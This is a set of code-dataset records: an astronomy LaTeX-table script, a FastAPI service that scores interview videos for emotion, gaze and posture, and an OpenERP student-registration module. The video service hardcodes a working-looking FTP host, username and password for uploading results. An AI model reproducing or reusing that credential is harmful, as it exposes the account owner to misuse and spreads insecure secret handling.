paramnames[ii] == 'a2' or paramnames[ii] == 'ac':\n #thisline[paramnames[ii]]= numpy.mean(xs)\n thisline[paramnames[ii]]= params[ii]\n err= numpy.std(xs)\n thisline[paramnames[ii]+'_err']= err \n else:\n #thisline[paramnames[ii]]= numpy.exp(numpy.mean(xs))\n thisline[paramnames[ii]]= numpy.exp(params[ii])\n err_low= numpy.exp(numpy.mean(xs))-numpy.exp(numpy.mean(xs)-numpy.std(xs))\n err_high= -numpy.exp(numpy.mean(xs))+numpy.exp(numpy.mean(xs)+numpy.std(xs))\n if err_low/err_high > 1.4 or err_low/err_high < 0.6:\n thisline[paramnames[ii]+'_low']= err_low\n thisline[paramnames[ii]+'_high']= err_high\n thisline[paramnames[ii]+'_err']= 0.5*(err_low+err_high)\n else:\n thisline[paramnames[ii]+'_err']= 0.5*(err_low+err_high)\n if thisline[paramnames[ii]] > 4.5:\n #Also list lower limit\n xs= sorted(numpy.array([s[ii] for s in samples]))\n indx2= int(numpy.floor(0.01*len(samples)))\n thisline[paramnames[ii]+'_ll']= numpy.exp(xs[indx2])\n #Set up line\n if 'bmin' in name:\n printline= 
'$|b| > 45^\\circ$ '\n elif 'bmax' in name:\n printline= '$|b| < 45^\\circ$ '\n elif 'north' in name:\n printline= '$b > 0^\\circ$ '\n elif 'south' in name:\n printline= '$b < 0^\\circ$ ' \n elif 'faint' in name:\n printline= 'faint plates '\n elif 'bright' in name:\n printline= 'bright plates '\n elif 'apoorpoor' in name:\n printline= '0.00 $<$ [$\\\\alpha$/Fe] $<$ 0.15 '\n elif 'apoorrich' in name:\n printline= '0.15 $\\leq$ [$\\\\alpha$/Fe] $<$ 0.25 '\n elif 'arichpoor' in name:\n printline= '0.25 $\\leq$ [$\\\\alpha$/Fe] $<$ 0.35 '\n elif 'arichrich' in name:\n printline= '0.35 $\\leq$ [$\\\\alpha$/Fe] $<$ 0.5\\phantom{0} '\n elif 'poorpoor' in name:\n printline= '\\protect{[}Fe/H] $<$ -0.7 '\n elif 'poorrich' in name:\n printline= '\\protect{[}Fe/H] $>$ -0.7 '\n elif 'richpoorest' in name:\n printline= '-1.5 $<$ \\protect{[}Fe/H] $<$ -0.6\\\\tablenotemark{1} '\n elif 'richpoor' in name:\n printline= '-0.6 $<$ [Fe/H] $<$ -0.3\\\\tablenotemark{1} '\n elif 'richrich' in name:\n printline= '-0.3 $<$ \\protect{[}Fe/H] \\phantom{$<$ -0.25} '\n else:\n printline= 'all plates '\n for paramname in format:\n if not thisline.has_key(paramname):\n printline+= '& \\ldots & '\n continue\n if thisline[paramname] > 4.5 \\\n and thisline[paramname] < 6.:\n ll, valerr= True, True\n elif thisline[paramname] >= 6.:\n ll, valerr= True, False\n else:\n ll, valerr= False, True\n #hz, hz1 are in pc\n for key in thisline.keys():\n if 'hz' in key \\\n and (key == paramname \\\n or key == (paramname+'_err') \\\n or key == (paramname+'_low') \\\n or key == (paramname+'_high') \\\n or key == (paramname+'_ll')):\n thisline[key]*= 1000.\n #Prepare\n if math.log10(thisline[paramname+'_err']) >= 0.:\n value= '%.0f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.0f}_{-%.0f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.0f' % thisline[paramname+'_err']\n elif math.log10(thisline[paramname+'_err']) >= -1.:\n value= '%.1f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.1f}_{-%.1f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.1f' % thisline[paramname+'_err']\n elif math.log10(thisline[paramname+'_err']) >= -2.:\n value= '%.2f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.2f}_{-%.2f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.2f' % thisline[paramname+'_err']\n elif math.log10(thisline[paramname+'_err']) >= -3.:\n value= '%.3f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.3f}_{-%.3f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.3f' % thisline[paramname+'_err']\n elif math.log10(thisline[paramname+'_err']) >= -4.:\n value= '%.4f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.4f}_{-%.4f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.4f' % thisline[paramname+'_err']\n elif math.log10(thisline[paramname+'_err']) >= -5.:\n value= '%.5f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.5f}_{-%.5f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.5f' % thisline[paramname+'_err']\n if ll and valerr:\n #Both error and lower limit\n lower_lim= '%.1f' % thisline[paramname+'_ll']\n printline+= '& $>$'+lower_lim+' ('+value+'&'+err+')'\n elif ll:\n #Just lower limit\n lower_lim= '%.0f' % thisline[paramname+'_ll']\n printline+= 
'& $>$'+lower_lim+' & '\n            else:\n                #Print value+err\n                printline+= '& '+value+'&'+err\n            if not section == sections[-1] or not name == section[-1]:\n                printline+= '\\\\\\\\'\n            #Write the line\n            outfile.write(printline+'\n')\n        if not section == sections[-1]:\n            outfile.write('\\\\\\\\\n')\n    outfile.write(cmdline+'\n')\n    outfile.close()\n\ndef get_options():\n    usage = \"usage: %prog [options] \\n\\noutputfilename= name of the file that the table will be saved to\"\n    parser = OptionParser(usage=usage)\n    parser.add_option(\"--table\",dest='table',default='richresults',\n                      help=\"Table to prepare ('richresults', 'poorresults','afe')\")\n    return parser\n\nif __name__ == '__main__':\n    resultsTable(get_options())\n","sub_path":"py/resultsTable.py","file_name":"resultsTable.py","file_ext":"py","file_size_in_byte":12012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"329740229","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom Face_Information import *\nimport cv2\nimport copy\nfrom starlette.responses import JSONResponse\nimport uvicorn\nfrom ftplib import FTP\nimport json\nfrom collections import OrderedDict\n\nfrom fastapi import BackgroundTasks\n\n\nfrom typing import List\nfrom starlette.middleware.cors import CORSMiddleware\nfrom database import session\nfrom model import TestTable, Test\n\n# explicit imports for modules used below (torch for device selection, os for file cleanup)\nimport os\nimport torch\n\n# parallel processing\nimport multiprocessing as Process\nimport time\n\n# check how many CPUs are available\nprint('available_CPU >> ', Process.cpu_count())\n\n\napp = FastAPI()\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=[\"*\"],\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n\nif torch.cuda.is_available():\n    device = torch.device(\"cuda\")\nelse:\n    device = torch.device(\"cpu\")\n\n#\n# FD_Net, Landmark_Net, Headpose_Net, Emotion_Net = Initialization()\n# pose_detector = pose_Detector()\n# Emotion_list = []\n\n\n\nasync def video_task(userkey, videoNo, videoaddress):\n    FD_Net, Landmark_Net, Headpose_Net, Emotion_Net = Initialization()\n    pose_detector = pose_Detector()\n    vc = cv2.VideoCapture(videoaddress)\n    FPS = vc.get(cv2.CAP_PROP_FPS)  # query the actual frame rate of the video\n    sound_confirm = soundcheck(videoaddress)\n\n    Gaze_list = []\n    Roll_list = []\n    Emotion_list = []\n    Left_Hand_list = []\n    Left_Hand_count = 0\n    Left_Hand_time_list = []\n    Left_Hand_point_list = []\n    Left_Hand_point_result = []\n    Right_Hand_list = []\n    Right_Hand_count = 0\n    Right_Hand_time_list = []\n    Right_Hand_point_list = []\n    Right_Hand_point_result = []\n    Left_shoulder_list = []\n    Right_shoulder_list = []\n    Center_shoulder_list = []\n    Shoulder_slope_list = []\n    shoulder_vertically_left_count = []\n    shoulder_vertically_right_count = []\n    Face_count_list = []  # per-frame face counts, accumulated over the whole video\n\n    bReady = True\n    if not vc.isOpened():\n        bReady = False\n\n    while bReady:\n        ret, frame = vc.read()\n        if ret:\n            if (int(vc.get(1)) % 5 == 0):  # analyse every fifth frame\n                frame = cv2.flip(frame, 1)\n                img = frame\n                img_show = copy.deepcopy(img)\n\n                list_Face = []\n\n                # face detection\n                Face_Detection(FD_Net, img, list_Face)\n                Face_count_list.append(len(list_Face))\n                # print(\"check\", len(list_Face))\n                if len(list_Face) > 0:\n                    # draw face ROI: loop over list_ETRIFace and draw a box for every detected face\n
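The resultsTable writer above keys the printed precision of each value to the magnitude of its error. A minimal standalone sketch of that rounding rule (the helper name `format_with_error` is mine, not the script's):

```python
import math

def format_with_error(value, err, max_dec=5):
    # 0 decimals when err >= 1, one more decimal per factor of ten below that
    ndec = max(0, min(max_dec, int(math.ceil(-math.log10(err)))))
    return '%.*f $\\pm$ %.*f' % (ndec, value, ndec, err)

if __name__ == '__main__':
    print(format_with_error(245.3, 12.0))   # 245 $\pm$ 12
    print(format_with_error(0.4312, 0.02))  # 0.43 $\pm$ 0.02
```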
                    for ii in range(len(list_Face)):\n                        cv2.rectangle(img_show, (list_Face[ii].rt[0], list_Face[ii].rt[1])\n                                      , (list_Face[ii].rt[2], list_Face[ii].rt[3]), (0, 255, 0), 2)\n\n                    Landmark_list = Landmark_Detection(Landmark_Net, img, list_Face, 0)\n\n                    # the additional recognition below runs on the first face only;\n                    # pass a different nIndex to select another face\n\n                    # draw landmark\n                    # cv2.circle(img_show, (list_Face[0].ptLE[0], list_Face[0].ptLE[1]), 1, (0,0,255), -1)\n                    # cv2.circle(img_show, (list_Face[0].ptRE[0], list_Face[0].ptRE[1]), 1, (0, 0, 255), -1)\n                    # cv2.circle(img_show, (list_Face[0].ptLM[0], list_Face[0].ptLM[1]), 1, (0, 0, 255), -1)\n                    # cv2.circle(img_show, (list_Face[0].ptRM[0], list_Face[0].ptRM[1]), 1, (0, 0, 255), -1)\n\n                    # pose estimation\n                    pose = HeadPose_Estimation(Headpose_Net, img, list_Face, 0)\n                    # print(\"Y:%.1f / P:%.1f / R:%.1f\" % (pose[0], pose[1], pose[2]))\n                    Roll_list.append(pose[2].item())\n\n                    # emotion classification\n                    Emotion_Classification(Emotion_Net, img, list_Face, 0)\n                    # emotion label\n                    sEmotionLabel = [\"surprise\", \"fear\", \"disgust\", \"happy\", \"sadness\", \"angry\", \"neutral\"]\n                    sEmotionResult = \"Emotion : %s\" % sEmotionLabel[list_Face[0].nEmotion]\n                    EmotionResult = list_Face[0].fEmotionScore\n\n                    Emotion_list.append(EmotionResult)\n\n                    # gaze\n                    gaze = Gaze_Regression(list_Face, 0)\n                    Gaze_list.append(pose_detector.gaze_Detecor(gaze, img_show))  # call on the pose_Detector instance created above\n\n                    # motion detection\n                    pose_detector.findPose(img_show)\n                    lmList_pose = pose_detector.findPosition(img_show)\n\n                    # left hand tracking\n                    if lmList_pose != 0:\n                        if lmList_pose[15][1] < 640 and lmList_pose[15][2] < 480:\n                            Left_hand = (lmList_pose[15][1], lmList_pose[15][2])\n                            Left_Hand_list.append(1)\n                            Left_Hand_time_list.append(1)\n                            Left_Hand_point_list.append(Left_hand)\n                        else:\n                            if len(Left_Hand_list) > 3:\n                                Left_Hand_count += 1\n                                Left_Hand_point_result.append(Left_Hand_point_list)\n                            Left_Hand_list = []\n                            Left_Hand_point_list = []\n\n                        # right hand tracking\n                        if lmList_pose[16][1] < 640 and lmList_pose[16][2] < 480:\n                            Right_hand = (lmList_pose[16][1], lmList_pose[16][2])\n                            Right_Hand_list.append(1)\n                            Right_Hand_time_list.append(1)\n                            Right_Hand_point_list.append(Right_hand)\n                        else:\n                            if len(Right_Hand_list) > 3:\n                                Right_Hand_count += 1\n                                Right_Hand_point_result.append(Right_Hand_point_list)\n                            Right_Hand_list = []\n                            Right_Hand_point_list = []\n\n                        # shoulders\n                        left_shoulder = (lmList_pose[11][1], lmList_pose[11][2])\n                        right_shoulder = (lmList_pose[12][1], lmList_pose[12][2])\n                        center_shoulder_left = int((lmList_pose[11][1] + lmList_pose[12][1]) / 2)   # x of the shoulder midpoint\n                        center_shoulder_right = int((lmList_pose[11][2] + lmList_pose[12][2]) / 2)  # y of the shoulder midpoint\n                        center_shoulder = (center_shoulder_left, center_shoulder_right)\n\n                        Left_shoulder_list.append(left_shoulder)\n                        Right_shoulder_list.append(right_shoulder)\n                        Center_shoulder_list.append(center_shoulder)\n\n                        # shoulder vertical movement\n                        shoulder_vertically_left_count.append(shoulder_vertically_left(left_shoulder, Landmark_list))\n                        shoulder_vertically_right_count.append(shoulder_vertically_right(right_shoulder, Landmark_list))\n\n                        # shoulder horizontal movement\n                        shoulder_horizontality_count_value = shoulder_horizontality_count(center_shoulder_left,\n                                                                                          Landmark_list)\n\n                        # shoulder slope\n                        shoulder_slope_value = shoulder_slope(right_shoulder, left_shoulder)\n                        Shoulder_slope_list.append(shoulder_slope_value)\n        else:\n            break\n\n    # frames where the detector did not find exactly one face\n    Face_count_no_one = len(Face_count_list) - Face_count_list.count(1)\n    if Face_count_no_one * 5 >= (FPS * 7):\n        # print(\"analysis skipped\")\n        Face_analy_result = False
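`vc.get(1)` in the loop above reads `cv2.CAP_PROP_POS_FRAMES`, so only every fifth frame is analysed. The sampling pattern in isolation (a hypothetical `sample_frames` generator; the mirror flip matches the task above):

```python
import cv2

def sample_frames(videoaddress, step=5):
    vc = cv2.VideoCapture(videoaddress)
    if not vc.isOpened():
        return
    while True:
        ret, frame = vc.read()
        if not ret:
            break
        # CAP_PROP_POS_FRAMES is the index of the frame to be decoded next
        if int(vc.get(cv2.CAP_PROP_POS_FRAMES)) % step == 0:
            yield cv2.flip(frame, 1)  # mirror the frame, as the task does
    vc.release()
```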
    else:\n        # print(\"analysis ok\")\n        Face_analy_result = True\n\n    Emotion_analysi = Emotion_analysis(Emotion_list)\n\n    # print(\"surprise\", Emotion_analysi[0], \"%\")\n    # print(\"fear\", Emotion_analysi[1], \"%\")\n    # print(\"disgust\", Emotion_analysi[2], \"%\")\n    # print(\"happy\", Emotion_analysi[3], \"%\")\n    # print(\"sadness\", Emotion_analysi[4], \"%\")\n    # print(\"angry\", Emotion_analysi[5], \"%\")\n    # print(\"neutral\", Emotion_analysi[6], \"%\")\n    # print('sum', Emotion_analysi[7])\n\n    # gaze analysis result: len(Gaze_list)\n\n    # face angle result\n    Roll_mean_value = Roll_mean(Roll_list)\n\n    # shoulder angle result\n    Shoulder_slope_mean_value = Shoulder_slope_mean(Shoulder_slope_list)\n\n    # shoulder movement results\n    Left_shoulder_max_y_value = Left_shoulder_max_y(Left_shoulder_list)\n    Left_shoulder_min_y_value = Left_shoulder_min_y(Left_shoulder_list)\n    Right_shoulder_max_y_value = Right_shoulder_max_y(Right_shoulder_list)\n    Right_shoulder_min_y_value = Right_shoulder_min_y(Right_shoulder_list)\n    Center_shoulder_max_x_value = Center_shoulder_max_x(Center_shoulder_list)\n    Center_shoulder_min_x_value = Center_shoulder_min_x(Center_shoulder_list)\n\n    # hands\n    Left_Hand_time = Left_Hand_time_calculation(Left_Hand_time_list)\n    Right_Hand_time = Right_Hand_time_calculation(Right_Hand_time_list)\n\n    result_data = OrderedDict()\n\n    result_data[\"userkey\"] = userkey\n    result_data[\"videoNo\"] = videoNo\n    result_data[\"result\"] = {\"face_check\": Face_analy_result, \"sound_check\": sound_confirm,\n                             \"emotion_surprise\": Emotion_analysi[0], \"emotion_fear\": Emotion_analysi[1],\n                             \"emotion_aversion\": Emotion_analysi[2], \"emotion_happy\": Emotion_analysi[3],\n                             \"emotion_sadness\": Emotion_analysi[4],\n                             \"emotion_angry\": Emotion_analysi[5], \"emotion_neutral\": Emotion_analysi[6],\n                             \"gaze\": Gaze_list, \"face_angle\": Roll_mean_value,\n                             \"shoulder_angle\": Shoulder_slope_mean_value,\n                             \"left_shoulder\": {\"high_spot\": Left_shoulder_max_y_value,\n                                               \"low_spot\": Left_shoulder_min_y_value,\n                                               \"move_count\": shoulder_vertically_left_count},  # left shoulder, vertical\n                             \"right_shoulder\": {\"high_spot\": Right_shoulder_max_y_value,\n                                                \"low_spot\": Right_shoulder_min_y_value,\n                                                \"move_count\": shoulder_vertically_right_count},  # right shoulder, vertical\n                             \"center_shoulder\": {\"left_spot\": Center_shoulder_max_x_value,  # horizontal movement\n                                                 \"right_spot\": Center_shoulder_min_x_value,\n                                                 \"left_move_count\": shoulder_horizontality_count_value[0],\n                                                 \"right_move_count\": shoulder_horizontality_count_value[1]},\n                             \"left_hand\": {\"time\": Left_Hand_time, \"count\": Left_Hand_count,\n                                           \"point\": Left_Hand_point_result},\n                             \"right_hand\": {\"time\": Right_Hand_time, \"count\": Right_Hand_count,\n                                            \"point\": Right_Hand_point_result}}\n\n    # with open('/home/ubuntu/projects/withmind_video/im_video/%d_%d_result.json' % (int(userkey), int(videoNo)), 'w', encoding='utf-8') as make_file:\n    #     json.dump(result_data, make_file, ensure_ascii=False, indent=\"\\t\")\n\n    Gaze_velue = Average.Gaze_Avg(Gaze_list)\n    Roll_velue = Roll_mean_value\n    Shoulder_velue = Shoulder_slope_mean_value\n    shoulder_left_count = shoulder_vertically_left_count\n    shoulder_right_count = shoulder_vertically_right_count
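The hand-tracking bookkeeping above counts one "gesture" whenever a run of more than three consecutive in-frame detections ends. The same rule isolated as a function (names are mine; unlike the script, this version also closes a run that lasts until the end of the video):

```python
def count_gestures(in_frame_flags, min_run=4):
    """in_frame_flags: iterable of truthy flags, one per sampled frame."""
    gestures, run = 0, 0
    for visible in in_frame_flags:
        if visible:
            run += 1
        else:
            if run >= min_run:  # the script uses len(list) > 3
                gestures += 1
            run = 0
    if run >= min_run:  # close a run that reaches the last frame
        gestures += 1
    return gestures

print(count_gestures([1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1]))  # 2
```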
    vertically_value = Average.vertically_Avg(Left_shoulder_max_y_value,\n                                              Left_shoulder_min_y_value,\n                                              Right_shoulder_max_y_value,\n                                              Right_shoulder_min_y_value)\n    horizontally_value = Average.horizontally_Avg(Center_shoulder_max_x_value, Center_shoulder_min_x_value)\n    GestureTIME_value = Average.GestureTIME(Left_Hand_time, Right_Hand_time)\n\n    # save the aggregated metrics to CSV\n    Average.Average_csv(Gaze_velue, Roll_velue, Shoulder_velue, shoulder_left_count, shoulder_right_count,\n                        vertically_value, horizontally_value, GestureTIME_value)\n\n    print('Gaze >> ', Gaze_velue, 'Roll >> ', Roll_velue,\n          'Shoulder >> ', Shoulder_velue, 'shoulder_left_count >> ', shoulder_left_count, 'shoulder_right_count >> ',\n          shoulder_right_count,\n          'vertically >> ', vertically_value, 'horizontally >> ', horizontally_value, 'GestureTIME >> ',\n          GestureTIME_value)\n\n    with open('C:/Users/withmind/Desktop/models/%d_%d_result.json' % (int(userkey), int(videoNo)), 'w', encoding='utf-8') as make_file:\n        json.dump(result_data, make_file, ensure_ascii=False, indent=\"\\t\")\n\n    ftp = FTP()\n\n    ftp.connect('withmind.cache.smilecdn.com', 21)\n    ftp.login('withmind', 'dnlemakdlsem1!')\n    ftp.cwd('./analy_result')\n    filename = '%d_%d_result.json' % (int(userkey), int(videoNo))\n    # fileroute = '/home/ubuntu/projects/withmind_video/im_video/'\n    fileroute = 'C:/Users/withmind/Desktop/models/'\n    myfile = open(fileroute + filename, 'rb')\n    ftp.storbinary('STOR ' + filename, myfile)\n\n    myfile.close()\n\n    os.remove(fileroute + filename)\n\n    test = TestTable()\n    test.userkey = userkey\n    test.videoNo = videoNo\n    test.face_check = Face_analy_result\n    test.sound_check = sound_confirm\n    test.emotion_surprise = Emotion_analysi[0]\n    test.emotion_fear = Emotion_analysi[1]\n    test.emotion_aversion = Emotion_analysi[2]\n    test.emotion_happy = Emotion_analysi[3]\n    test.emotion_sadness = Emotion_analysi[4]\n    test.emotion_angry = Emotion_analysi[5]\n    test.emotion_neutral = Emotion_analysi[6]\n    test.gaze = Gaze_list\n    test.face_angle = Roll_mean_value\n    test.shoulder_angle = Shoulder_slope_mean_value\n    test.left_shoulder = {\"high_spot\": Left_shoulder_max_y_value, \"low_spot\": Left_shoulder_min_y_value,\n                          \"move_count\": shoulder_vertically_left_count}\n    test.right_shoulder = {\"high_spot\": Right_shoulder_max_y_value, \"low_spot\": Right_shoulder_min_y_value,\n                           \"move_count\": shoulder_vertically_right_count}\n    test.center_shoulder = {\"left_spot\": Center_shoulder_max_x_value,\n                            \"right_spot\": Center_shoulder_min_x_value,\n                            \"left_move_count\": shoulder_horizontality_count_value[0],\n                            \"right_move_count\": shoulder_horizontality_count_value[1]}\n    test.left_hand = {\"time\": Left_Hand_time, \"count\": Left_Hand_count,\n                      \"point\": Left_Hand_point_result}\n    test.right_hand = {\"time\": Right_Hand_time, \"count\": Right_Hand_count,\n                       \"point\": Right_Hand_point_result}\n\n    session.add(test)\n    session.commit()\n\n\nclass Item(BaseModel):\n    userkey: int\n    videoNo: int\n    videoaddress: str\n\n@app.post(\"/\", status_code=202)\nasync def analy(item: Item, background_tasks: BackgroundTasks):\n    userkey = item.userkey\n    videoNo = item.videoNo\n    videoaddress = item.videoaddress\n\n    # vc = cv2.VideoCapture(videoaddress)
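The finished JSON report is pushed over FTP in binary mode and then removed locally. A generic version of that upload step (host, directory and credentials are placeholders):

```python
import os
from ftplib import FTP

def upload_and_cleanup(local_path, remote_dir, host, user, password):
    ftp = FTP()
    ftp.connect(host, 21)
    ftp.login(user, password)
    ftp.cwd(remote_dir)
    with open(local_path, 'rb') as fh:  # binary mode, as STOR requires
        ftp.storbinary('STOR ' + os.path.basename(local_path), fh)
    ftp.quit()
    os.remove(local_path)  # the script deletes the local copy after upload
```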
    #\n    # test = True\n    #\n    # if vc.isOpened() == False:\n    #     result = False\n    #     return test\n    #\n    # # soundconfirm = soundcheck(videoaddress)\n    # while(test):\n    #     ret, frame = vc.read()\n    #     print(\"1\")\n    #     if ret:\n    #         if(int(vc.get(1)) % 5 == 0):\n    #             frame = cv2.flip(frame, 1)\n    #             img = frame\n    #             img_show = copy.deepcopy(img)\n    #             list_Face = list()\n    #             # await Face_Detection(FD_Net, img, list_Face)\n    #\n    #             # background_tasks.add_task(Face_Detection, FD_Net, Landmark_Net, Headpose_Net, Emotion_Net, img, list_Face)\n\n    background_tasks.add_task(video_task, userkey, videoNo, videoaddress)\n\n    return \"1\"\n\n\nif __name__ == '__main__':\n    uvicorn.run(app, port=8000)\n\n    # one-off multiprocessing benchmark, left disabled: uvicorn.run() blocks until\n    # the server exits, and pool.map would hand each bare string to video_task,\n    # which expects (userkey, videoNo, videoaddress)\n    # start_time = time.time()\n    # p_list = ['proc_1', 'proc_2', 'proc_3', 'proc_4']\n    # pool = Process.Pool(processes=4)\n    # pool.map(video_task, p_list)\n    # pool.close()\n    # pool.join()\n    # print('time >> ', time.time() - start_time)","sub_path":"multiprocessing/multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":17457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"201842013","text":"# -*- coding: utf-8 -*-\n#/#############################################################################\n#\n#    Tech-Receptives Solutions Pvt. Ltd.\n#    Copyright (C) 2004-TODAY Tech-Receptives().\n#\n#    This program is free software: you can redistribute it and/or modify\n#    it under the terms of the GNU Affero General Public License as\n#    published by the Free Software Foundation, either version 3 of the\n#    License, or (at your option) any later version.\n#\n#    This program is distributed in the hope that it will be useful,\n#    but WITHOUT ANY WARRANTY; without even the implied warranty of\n#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#    GNU Affero General Public License for more details.\n#\n#    You should have received a copy of the GNU Affero General Public License\n#    along with this program. 
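The endpoint above answers 202 immediately and defers the heavy analysis through FastAPI's `BackgroundTasks`. The pattern on its own (model and task names here are illustrative):

```python
from fastapi import BackgroundTasks, FastAPI
from pydantic import BaseModel

app = FastAPI()

class Job(BaseModel):          # hypothetical request body
    video_url: str

def analyse(video_url: str):   # stand-in for video_task
    print("analysing", video_url)

@app.post("/analyse", status_code=202)
async def enqueue(job: Job, background_tasks: BackgroundTasks):
    # the task runs after the response has been sent
    background_tasks.add_task(analyse, job.video_url)
    return {"accepted": True}
```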
If not, see .\n#\n#/#############################################################################\nfrom openerp.osv import osv, fields\nfrom openerp import SUPERUSER_ID\nimport time\nfrom openerp.tools.translate import _\nfrom openerp import models, api\nimport openerp.addons.decimal_precision as dp\nfrom datetime import datetime\nfrom dateutil import relativedelta\n\nclass oschool_student(osv.osv):\n _inherit = 'res.partner'\n\n def registration_student(self, cr, uid, ids, context=None):\n if not ids: return []\n current_session_ids = self.pool.get('pos.session').search(cr, uid, [\n ('state', '!=', 'closed'),\n ('user_id', '=', uid)], context=context)\n if not current_session_ids:\n raise osv.except_osv(_('Error!'), _('Open a session first.'))\n\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'oschool', 'view_student_registration_dialog_form')\n\n inv = self.browse(cr, uid, ids[0], context=context)\n return {\n 'name':_(\"Registration Student\"),\n 'view_mode': 'form',\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'pos.order.line',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'target': 'new',\n 'domain': '[]',\n 'context': {\n 'default_student_id': inv.id,\n 'default_type': 'registration',\n 'type': 'registration'\n }\n }\n\n _columns = {\n 'registration_ids': fields.one2many('pos.order.line', 'student_id', 'Registration List', domain=[('type' , '=', 'registration')]),\n }\n\noschool_student()\n\nclass pos_order_line(osv.osv):\n _inherit = 'pos.order.line'\n\n def registration_refund(self, cr, uid, ids, context=None):\n if not ids:\n return []\n clone_list = []\n inv = self.browse(cr, uid, ids[0], context=context)\n if not inv.order_id:\n student = inv.student_id\n self.unlink(cr, uid,[inv.id])\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'oschool', 'view_oschool_student_form')\n\n return {\n 'name': _(\"Oschool Student\"),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': student.id,\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'res.partner',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n }\n if inv.order_id and inv.order_id.state == 'draft':\n student = inv.student_id\n self.pool.get('pos.order').unlink(cr, uid, inv.order_id.id)\n self.unlink(cr, uid,[inv.id])\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'oschool', 'view_oschool_student_form')\n return {\n 'name': _(\"Oschool Student\"),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': student.id,\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'res.partner',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n }\n\n if inv.refunded:\n raise osv.except_osv(_('Warning!'), _('Please select another line because it Refunded.'))\n if inv.qty < 0:\n clone_list.append(inv.order_id.id)\n else:\n line_obj = self.pool.get('pos.order.line')\n student_obj = self.pool.get('res.partner')\n\n for order in self.browse(cr, uid, ids, context=context).order_id:\n current_session_ids = self.pool.get('pos.session').search(cr, uid, [\n ('state', '!=', 'closed'),\n ('user_id', '=', uid)], context=context)\n if not current_session_ids:\n raise osv.except_osv(_('Error!'), _('To return product(s), you need to open a session that will be used to register the refund.'))\n\n clone_id = self.pool.get('pos.order').copy(cr, uid, order.id, {\n 'name': order.name + ' REFUND', # not used, name forced by create\n 'session_id': current_session_ids[0],\n 'date_order': 
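Each handler in this module hands control back to the client by returning an `ir.actions.act_window` dictionary. A minimal sketch of that convention (model and view names are placeholders); note that some of the dictionaries above repeat the `'view_type'` key, so only the last occurrence takes effect:

```python
def open_form_action(model, res_id, view_id, title):
    # OpenERP 7/8-style window action: open one record in a modal form view
    return {
        'name': title,
        'type': 'ir.actions.act_window',
        'res_model': model,
        'res_id': res_id,
        'view_id': view_id,
        'view_type': 'form',
        'view_mode': 'form',
        'target': 'new',   # 'new' opens a dialog, 'current' replaces the view
        'nodestroy': True,
    }
```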
time.strftime('%Y-%m-%d %H:%M:%S'),\n }, context=context)\n clone_list.append(clone_id)\n\n for clone in self.pool.get('pos.order').browse(cr, uid, clone_list, context=context):\n for order_line in clone.lines:\n line_obj.write(cr, uid, [order_line.id], {\n 'qty': -order_line.qty\n }, context=context)\n line_obj.write(cr, uid, inv.id, {'refunded': True}, context=context)\n student_obj.write(cr, uid, inv.student_id.id, {'academic_year_id': False,'group_id': False,'class_id': False}, context=context)\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'oschool', 'view_oschool_refund_pos_form')\n\n return {\n 'name': _(\"Refund Registration\"),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': clone_list[0],\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'pos.order',\n 'type': 'ir.actions.act_window',\n 'nodestroy': False,\n 'target': 'new',\n 'context': {\n 'subscription_month': inv.period_id.code,\n }\n }\n\n def button_registration_pay(self, cr, uid, ids, context=None):\n return self.action_payment(cr, uid, ids, context=None)\n def button_registration(self, cr, uid, ids, context=None):\n return True\n\n def action_payment(self, cr, uid, ids, context=None):\n pos_ref = self.pool.get('pos.order')\n pos_line_ref = self.pool.get('pos.order.line')\n product_obj = self.pool.get('product.product')\n journal_obj = self.pool.get('account.journal')\n pos_ids = []\n\n for line in self.pool.get('pos.order.line').browse(cr, uid, ids, context=context):\n if line.order_id:\n inv_id = line.order_id.id\n else:\n inv = {'partner_id': line.parent_id.id, 'pricelist_id': line.parent_id.property_product_pricelist.id, 'student_id': line.student_id.id}\n inv_id = pos_ref.create(cr, uid, inv, context=context)\n user = self.pool.get('res.users').browse(cr,uid,uid)\n seq_id = user.pos_config.sequence_id\n name = self.pool.get('ir.sequence').next_by_id(cr, uid, seq_id.id)\n #Ici on force le pos order de prendre la réference correcte\n #calculée en utilisant le user_id\n pos_ref.write(cr, 